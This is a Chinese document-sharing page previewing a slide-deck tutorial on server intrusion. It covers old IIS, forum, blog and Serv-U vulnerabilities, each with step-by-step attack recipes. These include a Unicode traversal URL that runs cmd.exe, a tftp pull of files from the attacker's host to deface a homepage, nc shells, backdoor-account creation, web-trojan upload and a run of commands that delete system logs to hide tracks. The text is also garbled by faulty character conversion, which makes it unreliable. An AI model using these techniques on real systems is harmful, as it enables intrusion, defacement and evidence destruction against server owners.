服务器入侵(免费奉送)_第1页
服务器入侵(免费奉送)_第2页
服务器入侵(免费奉送)_第3页
服务器入侵(免费奉送)_第4页
服务器入侵(免费奉送)_第5页
已阅读5页,还剩76页未读 继续免费阅读

下载本文档

版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领

文档简介

1、基于效力器软件破绽的入侵随着计算机运用的进一步普及和计算机网络的高速开展,越来越多的公司或个人架设本人的网络效力。但是这些软件在给人们带来方便和益处的时候本身的缺陷却被忽略。效力器软件破绽轻那么导致效力器的信息被窃取,重那么导致效力器被远程控制。.本章内容IIS破绽带来的入侵论坛系统带来的入侵Blog系统带来的入侵Serv-U带来的入侵.IIS破绽带来的入侵IIS为Internet Information Server的缩写,是Windows系统提供的Internet效力,作为“windows组建附加在windows系统中。经过IIS,windows系统可以方便的提供Web效力、FTP效力和S

2、MTP效力等。IIS在方便用户运用的同时,也带来了平安隐患。听说有关IIS的平安破绽有上千种,其中能被用来入侵的破绽大多数属于“溢出型破绽。对于这种破绽,入侵者可以经过发送特定格式的数据是远程效力器溢出,从而突破系统的维护。.关于溢出破绽.ida&.idq破绽Painter破绽Unicode破绽.asp映射分块编码破绽Webdav破绽关于扩展引发的破绽Windows Media效力nsiislog.dll远程缓冲区溢出破绽Microsoft Frontpage Server Extensions远程缓冲区溢出破绽.搜集IIS信息1、经过telnet 目的IP 80搜集Web效力器版本信息2、在

3、telnet连上之后需求连敲两次回车才干得到信息3、经过telnet 目的IP 21搜集FTP效力器版本信息.ida&.idq破绽破绽描画IIS的index server .ida/.idq ISAPI扩展存在缓冲区溢出破绽影响系统IIS4.0和5.0Index Server可以加快Web的搜索才干,提供对管理员脚本和Internet数据的查询,默许支持管理脚本.ida和查询脚本.idq,不过都是运用idq.dll来进展解析。但是存在一个缓冲区溢出,其中问题存在于idq.dll扩展程序上,由于没有对用户提交的参数进展边境检查,可以导致远程攻击者利用理出货的system全线来访问远程系统。.破绽

4、检测手工方式:在IE中输入httptargetIP/*.ida或httptargetIP/*.idq 回车确认后假设提示“找不到*文件的信息,就阐明存在该破绽工具检测:X-Scan在“扫描模块中选中“IIS破绽,假设得到“能够存在IIS Index Server ISAPI扩展远程溢出破绽/null.ida或/null.idq那么阐明存在该破绽。.破绽利用IDA入侵实例IDAHack:是基于命令行的溢出工具,可以溢出打了sp1、sp2补丁的Windows 200。当远程效力器溢出后,便会在指定的端口得到一个Telnet权限Idahack 类型:中文win200 1中文win200 sp1 2中

5、文win200 sp2 3.入侵思绪1、扫描远程效力器,先用X-scan扫描,然后手工炎症2、运用idahack IP 80 1 520进展溢出3、胜利后,运用telnet IP 520远程登录效力器4、运用上一章所讲方法建立后门帐号5、exit退出.IDQ入侵实例IISIDQ是snake编写的IDQ溢出工具,有命令行和图形界面两种方式,而且溢出胜利后可以选择两种入侵方式Iisidq 命令1Iisidq 命令1类型:0iis5中文win20001iis5中文win2000 sp12iis5中文win2000 sp2.溢出后的衔接工具-ncNc在网络攻击中素有“瑞士军刀的佳誉,是入侵者经常运用的

6、工具之一。自动衔接到外部:nc -option host port ports监听以等待外部衔接:nc l p port -option host port详细讲解参考协助.入侵思绪1、扫描远程效力器,确认存在IDQ溢出破绽2、IDQ溢出iisidq 0 IP 80 1 521 1表示以iisidq的衔接方式一对ip进展IDQ溢出破绽,端口为80,胜利后,远程效力器会翻开521号端口等待外部衔接。参数输入命令1设为1,表示不运用默许命令“cmd.exe /c+dir,而是要在以后输入新的命令也可以运用iisidq的gui工具来实现3、nc衔接nc v IP 521,从而获得具有管理员权限的sh

7、ell4、建立后门账号5、exit退出.平安处理方案1、下载安装补丁2、删除对.ida和.idq的脚本映射.Printer破绽Windows 2000 IIS5.0 .print ISAPI扩展存在缓冲区溢出破绽影响系统windows 2000 3个 serverWindow 2000 iis 5.0存在打印扩展ISAPI使得.printer扩展与msw3prt.dll扩展名到msw3prt.dll的映射关系,并会处置用户恳求,但在msw3port.dll文件中存在缓冲区溢出破绽。“Host:栏中包含大约420字节的Http.printer恳求给效力器,就可以导致缓冲区溢出并执行人以代码。该攻

8、击可以使Web效力器停顿呼应。该破绽非常危险,仅需求代开80端口或者443端口。.破绽检测运用X-Scan扫描IIS破绽,假设得到“能够存在IIS 5.0 .printer远程缓冲区溢出破绽那么阐明该效力器存在.printer破绽。.破绽利用运用工具IIS5 .printer Exploit进展破绽利用格式:iis5exploit ,稍等片刻,假设溢出胜利,便会在本级nc监听的窗口出现,此时入侵者就得到了远程效力器管理员的shell。.入侵实例1、运用nc l p 250在本地开一个监听端口2、运用iis5exploit 对远程主机进展破绽溢出。建立后门账号退出.也可以运用iisx进展破绽溢出

9、格式:iisx Sp:0没有补丁,1有补丁-p:假设溢出胜利,就会在远端翻开7788端口等待衔接-a:假设溢出胜利,会在远端添加一个管理员账号hax:hax,入侵者可以运用net use衔接远端效力器,或者运用DameWare实现远程控制。-r:反向衔接,可以穿透部分设置的防火墙。入侵者首先在本地nc翻开监听端口。.平安处理方案打补丁,微软曾经发布了针对该破绽的补丁.Unicode目录遍历破绽微软IIS4.0或5.0扩展Unicode目录遍历破绽影响系统:win2000 及 NT4.0IIS4.0或5.0 都存在利用扩展Unicode字符取代“/和“而能利用“./目录遍历的破绽。未经授权的用户

10、能够利用IUSR_machinename帐号的上下文空间访问任何知的文件。该帐号在默许情况下属于Everyone和Users组的成员,因此任何与Web根目录在同一逻辑驱动器上的能被这些用户组访问的文件都能被删除修正或执行。.破绽利用从破绽的描画可以看出,Unicode破绽允许未经授权的用户运用客户端IE来构造非法字符。因此只需入侵者可以狗仔出适当的字符如“/ “,就可以利用“./来遍历与Web根目录处在一个逻辑驱动器上的目录,从而导致“非法遍历。这样一来入侵者就可以利用该方法操作该效力器上的磁盘文件,可以新建、下载、删除、执行磁盘文件。除此之外,入侵者经过构造Unicode编码利用来找到并翻开

11、该效力器上的cmd来执行命令可以利用%c1%1c=/和%c0%2f=来构造.破绽检测手工:假设远程效力器为win200pro,在IE地址栏中输入IP/scripts/.%c1%1c./winnt/system32/cmd.exe?/c+dir+c:,与远程效力器衔接之后,假设把C盘的内容列出来了那么证明存在该破绽。工具检测:运用X-scan选中“IIS破绽,假设得到类似的“/scripts/.%252f/cmd.exe?/c+dir就阐明存在破绽.破绽利用利用Unicode破绽,入侵者可以把IE编程远程执行命令的控制台。不过Unicode破绽并不是远程溢出破绽,不能拿到管理员权限的shell,

12、只能进展简单的文件类操作。.实例1:涂鸦主页1、预备一个本人涂鸦的主页2、探知远程效力器的Web根目录假设存在.ida&.idq可以在地址栏中输入ip/1.ida从而获得web根目录经过查找文件的方法找到远程效力器的Web根目录。在地址栏中输入ip/scripts/.%c1%1c./winnt/system32/cmd.exe?/c+dir+c:mmc.gif/s3、涂鸦主页:可以利用dir+web根目录来查找主页4、上传主页覆盖:在本地翻开TFTP效力器,不进展任何设置,只需把预备好的web文件拷贝到tftf效力器途径下即可。TFTP的命令:tftp I host GET|PUT sourc

13、e desttftp+IP+get+1.htm+web根目录index.htm来覆盖该效力器的主页。.实例2:擦脚印在客户端IE阅读器中利用Unicode编码破绽,运用以下命令去除日志文件:Del+c:winntsystem32logfiles*.*Del+c:winntsystem32config*.evtDel+c:winntsystem32dtclog*.*Del+c:winntsystem32*.logDel+c:winntsystem32*.txtDel+c:winnt*.txtDel+c:winnt*.log.实例3:Unicode综合利用ASP工具海阳顶端网木马,是一套asp在线

14、的网页编辑软件,支持在线更改、编辑、删除恣意文本文件,是无组件asp上传。1、上传木马文件,利用tftp2、隐藏木马文件,利用attrib +h +s3、可以写成一个bat处置文件.入侵步骤1、把load.bat传到远程效力器的C盘tftp2、经过bat文件把木马传入该效力的web根目录下。3、控制效力器,密码是haiyangtop.126.平安处理方案打补丁进展修修复.asp映射分块编码破绽Window 2000和NT4 IIS .asp映射存在远程缓冲溢出破绽影响系统window2000和NTASP ISAPI过滤器默许在window2000和NT4种装在,存在的破绽可以导致远程执行恣意命

15、令。恶意攻击者可以运用分块编码方式数据给IIS效力器,当解码和解析这些数据的时候可以迫使IIS把入侵者提供的数据写到内存恣意位置。该破绽可以使win200产生缓冲区溢出并以IWAM_computername用户的权限执行恣意代码。.破绽检测运用X-scan,假设得到“能够存在IIS.asp映射分块编码远程缓冲区溢出破绽就阐明远程效力器存在该破绽。.破绽利用IIS aps.dll overflow program 2.0格式:aspcode aspfile webport winxp假设键入aspcode IP,接着按几下回车键等待一会儿,假设得到c:winntsystem32的提示符,就意味着

16、溢出胜利。可以经过打补丁的方式来处理该破绽.WebDAV破绽Windows 2000 ntdll.dll webDAV接口远程缓冲区溢出破绽影响系统window 2000系统IIS5.0带有WebDAV组件对用户输入的传送给ntdll.dll程序处置的恳求未作充分的边境检查,远程入侵者可以经过向WebDAV提交一个精心构造的超凡数据恳求而导致发生缓冲区溢出,能够使入侵者以LocalSystem的权限在主机上执行恣意命令。.破绽检测WebDAVScan是红盟编写的专门用于检测IIS5.0中WebDAV破绽的公用扫描器,可以扫描一个IP段,并可以前往远程效力的Web效力器版本。.破绽利用Wd0.3

17、-en.exe:英文版IIS溢出工具,需求与nc配合运用,可以突破一定限制的防火墙。首先运用nc在本地翻开一个监听端口nc vv l p 250然后翻开wd0.3-en.exe,在其中输入远程效力器IP,本机IP和端口。然后进展破绽溢出,等一段时间后,假设WebDAV破绽溢出胜利,远程效力器便会与本地的监听端口自动衔接,建立衔接后,就可以执行任何命令。.Webdavx3,中文版的IIS溢出工具,溢出胜利后直接翻开7788端口等待衔接。运用方法:webdavx3 WebDAV:突破防火墙的WebDAV溢出运用方法:webdav Port:为目的web效力器的端口Offset:普通设为0,8,9的

18、胜利几率高一旦出现“c:inetputwwwrootnnnnn OK!表示胜利。留意该工具只支持中文版的win2000.实例运用Webdavx3对中文版的IIS5进展WebDAV破绽溢出1、运用WebDAVScan扫描WebDAV破绽2、运用Webdavx3对远程IIS5进展溢出3、运用telnet或者nc远程登录效力器4、建立后门账号5、退出.平安处理方案安装微软提供的相关补丁 .WebDAV超凡恳求远程回绝效力攻击破绽Microsoft IIS WebDAV超凡恳求远程回绝效力攻击破绽影响系统:IIS5.0 IIS5.1描画:IIS5.0默许提供了对WebDAV的支持,WebDAV可以经过

19、HTTP向用户提供远程文件存储的效力。WebDAV实现对部分方式的超凡恳求处置不正确,远程攻击者可以利用这个破绽对IIS效力器进展回绝效力攻击。攻击者可以运用prfofind或search恳求方法,提交包含49153字节的WebDAV恳求,IIS会由于回绝效力而重新启动。.破绽利用回绝效力攻击也称DoS,在这种攻击下,经过阻塞目的网络或发送畸形数据使远程效力器过载而瘫痪,从而不能向任何客户提供效力。通常来说,dos不需求远程效力器存在任何破绽,完全是恶意攻击,入侵者得不到任何权限。.实例经过WebDAV回绝效力攻击破绽使远程IIS效力器回绝效力运用Webdavdos格式webdavdos ip

20、但是该工具的胜利几率比较低,其实可以利用webdavx3进展溢出,胜利后会翻开7788端口,而80端口就死掉了.平安处理方案安装相应补丁程序.WebDAV XML音讯处置远程回绝效力破绽影响系统:IIS6.0 5.1 5.0描画:IIS包含的WebDAV组件对特殊构造的WebDAV恳求处置不正确,远程攻击者可以利用这个破绽利用WebDAV耗费大量内存和CPU时间,导致回绝效力攻击。攻击者可以构建恶意的运用XML属性的WebDAV Proffind恳求,可导致XML解析器耗费大量的内存和CPU时间,呵斥回绝效力。.破绽检测运用X-scan,设定“攻击测试脚本扫描工程进展扫描.破绽利用由于需求运用

21、到Perl,所以大家下去后本人找资料进展学习。.WindowsMedia效力nsiislog.dll远程缓冲区溢出破绽影响系统:windows 2003/2000描画:Microsoft Windows媒体效力,支持经过多播流从网络上传送媒体内容给客户端。Windows的媒体效力的ISAPI扩展实现对用户恳求处置存在缓冲区溢出破绽,远程攻击者可以利用这个破绽对效力进展回绝效力攻击或执行恣意命令。在多播流中,为了能记录客户端信息,Windows 2000提供了多播和单播传输进展记录的功能。此功能以ISAPI扩展实现nsiislog.dll。Windows 2000下安装的nsiislog.dll

22、处置超凡POST恳求数据时存在缓冲区溢出破绽,这可导致供应者发送畸形恳求给效力器,使IIS停顿对Internet恳求的相应或执行恣意命令。.破绽检测假设远程计算机翻开了Windows Media效力,其主机上会翻开1755端口,而开放Media效力的远程主机有存在破绽的能够性。运用SuperScan来检测主机能否开放了1755端口。或者运用X-scan进展扫描.破绽利用Iis.exe运用格式:iis IP port这个工具是nsiislog.dll远程缓冲区溢出破绽的公用溢出工具,溢出胜利后,远程主时机翻开59端口等待入侵者衔接。.Microsoft FrontPage Server Exte

23、nsions远程缓冲区溢出破绽影响系统:windows xp,2000描画:Microsoft Frontpage效力器扩展是Microsoft公司开发的用于加强IIS web效力器的功能的软件包Frontpage Server Extensions存在两个新的平安破绽,远程攻击者可以利用这个破绽进展缓冲区攻击,能够以Frontpage进程权限在系统上执行恣意指令。.运用X-scan进展扫描运用fp30reg 进展溢出攻击,溢出胜利后绑定9999端口,同时会获得shell权限。该方法胜利的几率比较高.论坛系统带来的入侵论坛是Internet上的一种电子信息效力系统,它提供一块公共电子白板,每个

24、注册用户都可以在上面发布信息或者提出看法。常见的论坛程序有动网论坛、雷遨论坛和比较流行的BBSXP论坛主要讲解一下上传破绽和暴库破绽.上传破绽动网论坛上传破绽的存在于DV BBS7.0 sp2及其更低的一切版本中,其中DVBBSsp2以前的版本可以利用工具直接上传asp文件破绽存在于根本资料修正中头像上传位置,单击上传按钮将调用upfile.asp文件,而该文件存在文件类型过滤不严的问题。.破绽利用思绪检测到破绽后,在存在破绽论坛中注册一个用户帐号,利用这个账号获取Cookie,在本地制造网页木马文件,运用公用工具结合已获取的Cookie值将网页木马上传到远程主机中。.搜索破绽在搜索引擎当中搜

25、索Powered By:DVbbs Version 7.0.0 SP1.注册用户由于想要运用上传破绽需求进入用户根本资料设置页面,因此需求先注册一个页面,假设用户名为ccniit,密码为123456.获取COOKIECookie是由Internet站点创建的、将信息存储在计算机上的文件,可以保管用户个人的存储信息,一旦将cookie保管在计算机上,只需创建Cookie的网站才干读取。COOKIE分为永久cookie和暂时cookie,暂时的阅读器一封锁就消逝,永久的保管在硬盘中,下次可以访问。.运用Winsock Expert获得cookie.运用海阳顶端网生成木马程序.利用DV BBS上传利

26、用程序上传网页木马.衔接检测胜利后就可以做进一步的入侵了观看视频上传破绽的利用.平安处理方案论坛系统的上传破绽是一个普遍存在的破绽,由于不同论坛系统在实现方式上存在差别,因此对于上传破绽的修补,需求到详细的论坛系统的官方网站下载相应的补丁包或晋级程序。.暴库破绽暴库是指经过显示错误信息的方式把数据库的物理途径给暴显露来。观看视频教程.暴库破绽利用思绪首先检测远程主机能否存在破绽。检测到破绽后注册一个账号,获取Cookie信息。暴库拿到管理员账号、前台密码和后台密码后结合曾经获得的Cookie进展Cookie欺骗,从而获得管理员权限。详细的操作看视频教程.Blog系统带来的入侵Blog是继Ema

27、il,BBS后出现的又一种网络交流方式。Blog大致可以分成两种形状,一种是个人创作,另一种是将个人以为有趣的有价值的内容引荐给读者。常用的Blog系统有L-Blog,Dlog,MissLog,oBlog等。Blog在给人们带来便利的同时,本身也存在需求完善的地方。关于blog的入侵,引见下在数据库破绽和Cookie欺骗破绽.直接下载数据库破绽直接下载数据库破绽属于设计破绽,允许未经授权的用户经过直接输入地址下载Blog系统的数据库。下面以猪飞飞的Dlog系统为例讲解如何入侵的.入侵思绪下载一个Dlog系统,查看其构造得到数据库所在的默许位置。经过搜索引擎寻觅存在破绽的Blog主机,运用直接输

28、入默许数据库途径的方式下载其数据库。查看已下载的数据库中的信息,获得管理员的相关信息。运用曾经得到的管理员前后台账号登录到远程Dlog系统中,改动文件上传格式限制,上传网页木马进而控制远程主机。.详细步骤经过分析发现dlog的数据库保管在%WebRoot%log_mdbdlog_mdb.mdb在IE地址栏中构造出途径,下载该数据库翻开数据库,查找管理员账号和密码破解经过MD5加密的密码获得用户名和密码.运用管理员的帐号和密码登录系统修正上传文件的类型限制,运用asa进展交换其他类型上传网页木马获得网马的途径,从而获得WebShell的权限.平安处理方案修正数据库的存放位置,对数据库称号进展修正

29、,同时更新数据库衔接文件的内容。.Cookie欺骗破绽Cookie欺骗破绽是由于系统对Cookie信息验证不严呵斥的。Cookie欺骗破绽很容易被设计者忽略,因此网上有很多的信息发布系统都存在这个破绽。.Serv-U带来的入侵Serv-U由两部分组成,引擎和用户界面,Serv-U引擎ServUDaemon是一个常驻后台的程序,担任处置各种Ftp客户端软件的ftp命令,同时担任执行各种文件传送的软件。Serv-U用户界面担任与Serv-U引擎之间的交互.Serv-U Ftp效力器MDTM命令远程缓冲区溢出破绽影响系统:Serv-U 5.0 4.x 3.x 2.x详细描画Serv-U在处置MDTM命令的参数时短少正确的缓冲区边境检查,远程攻击者可以利用这个破绽对Ftp效力器程序进展缓冲区溢出攻击,能够以Ftp进程权限在系统上执行恣意命令Serv-U提供ftp命令MDTM用于用户更改文件时间,当用户胜利登陆系统,并发送畸形超长的时区数据作为命令参数,可触发缓冲区溢出,精心构造参数数据能够以Ftp进程

温馨提示

  • 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
  • 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
  • 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
  • 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
  • 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
  • 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
  • 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

评论

0/150

提交评论